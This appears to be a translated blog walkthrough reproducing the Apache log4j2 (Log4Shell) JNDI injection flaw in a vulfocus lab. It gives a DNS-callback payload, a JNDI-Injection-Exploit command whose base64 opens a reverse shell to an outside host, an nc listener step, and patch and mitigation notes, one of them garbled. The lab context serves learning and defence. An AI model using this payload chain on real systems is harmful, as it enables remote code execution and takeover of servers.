Replication of Apache log4j2 Remote Code Execution Vulnerability – subsequent exploitation

Time:2022-1-8

Replication of Apache log4j2 Remote Code Execution Vulnerability

Recently, a remote code execution vulnerability of Apache log4j2 broke out. I heard that it is extremely harmful. Let’s repeat it.

Vulnerability principle:

JNDI injection vulnerability exists in Apache log4j 2. This vulnerability can be triggered when the program logs the data entered by the user. Successful exploitation of this vulnerability can execute arbitrary code on the target server.

To put it simply: when printing the log, if your log contains the keyword ${, the attacker can replace the content contained in the keyword with any attack command as a variable and execute it

Apache log4j2 is an open source Java logging tool, which is used by a large number of business frameworks. This vulnerability is caused by the lookup function provided by log4j2, which allows developers to read the configuration in the corresponding environment through some protocols. However, in the process of implementation, the input is not strictly judged, resulting in loopholes.

Vulnerability details:

Severity of Apache log4j Remote Code Execution Vulnerability: due to the recursive parsing function of some functions of Apache log4j2, attackers can directly construct malicious requests and trigger remote code execution vulnerabilities. Vulnerability exploitation requires no special configuration. Vulnerability analysis: Apache log4j is a Java based logging component. Apache log4j2 is an upgraded version of log4j. It introduces rich features by rewriting log4j. The log component is widely used in business system development to record program input and output log information. On November 24, 2021, Alibaba cloud security team reported the Apache log4j2 Remote Code Execution Vulnerability to Apache officials. Due to the JNDI injection defect in the log4j2 component when processing program log records, an unauthorized attacker can use this vulnerability to send carefully constructed malicious data to the target server, trigger the log4j2 component parsing defect, realize the execution of arbitrary code on the target server and obtain the privileges of the target server.

Environment construction

Environmental address:http://vulfocus.fofa.so/#/dashboard
A docker environment is found. You can directly pull the environment of Apache log4j2 from vulfocus

  1. Install docker
  2. Install vulfocus
  3. Just pull the log4j2 environment image and start it

image

For the first two steps of installing docker and installing vulfocus, please refer to the following links:
https://blog.csdn.net/m0_50406447/article/details/119169686

Vulnerability recurrence (dnslog)

After starting the environment, open the IP to get the following page:

image

Visit the following URL:http://vulfocus.fofa.so:43133/hello
Then pass in the following payload via post to verify DNS access:
payload:payload=${jndi:ldap://wdhcrj.dnslog.cn/exp}

image

We found a successful echo result, indicating that the execution was successful.

Vulnerability recurrence (rebound shell)

My experiment is a shooting range built on the public network, so the rebound shell uses its own public network VPS. Please equip yourself with a public network VPS (or build a shooting range locally and rebound the shell locally!): Now the experiment begins

  1. Set up the shooting range according to the above steps.
  2. Download a jar package to build the LDAP server and HTTP server
    Download address: link:https://pan.baidu.com/s/1XGXspiK9KuOU3kk_GRXb4wExtraction code: zrvu

After downloading, run the jar package and execute the following command to open it

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c 
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "1.2.3.4"

Note: the base64 above is a rebound shell code. Replace it with your own IP and listening port, regenerate the base64 and put it in, and replace the following - A with your own listening IP

My listening IP is 101.42 xx. XX: 9999, modify according to your own situation

image

After executing the command and starting the service, the terminal will display five payloads. Select the corresponding payloads according to your Java version to execute. Here, the fifth payload I selected: rmi://101.42.xx.xx:1099/vgylii

Then we start a terminal and listen to the port 9999 just set

nc -lvnp 9999

Then go to the shooting range to execute the payload generated above, and the shell connection will rebound.

image

If the execution is successful, OK will appear, and then see that the port we just listened to has been connected to the rebound shell

image

As for the execution of other commands, you can execute them with Base64 coding! Well, the experiment is over.

Vulnerability fixes:

Apache has officially released a patch, and Tencent security experts recommend that affected users upgrade to a secure version as soon as possible.

Patch download address:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1

Vulnerability mitigation measures:

(1) JVM parameter – dlog4j2 formatMsgNoLookups=true

(2)log4j2.formatMsgNoLookups=True

Attach a link to the detailed analysis below:
https://bbs.ichunqiu.com/thread-62322-1-1.html
https://www.oschina.net/news/172999

Tags: , , , ,

Recommended Today

Swiftui learning-1 understanding of MVVM

MVVM Originally, we have been developing with Objective-C, and the application itself is based on MVC to build the code structure. Recently, we learned that swiftui must comply with MVVM to work, so we began to understand this concept deeply. Mainly through the open class of Stanford University, summarize the important knowledge points. Link below: […]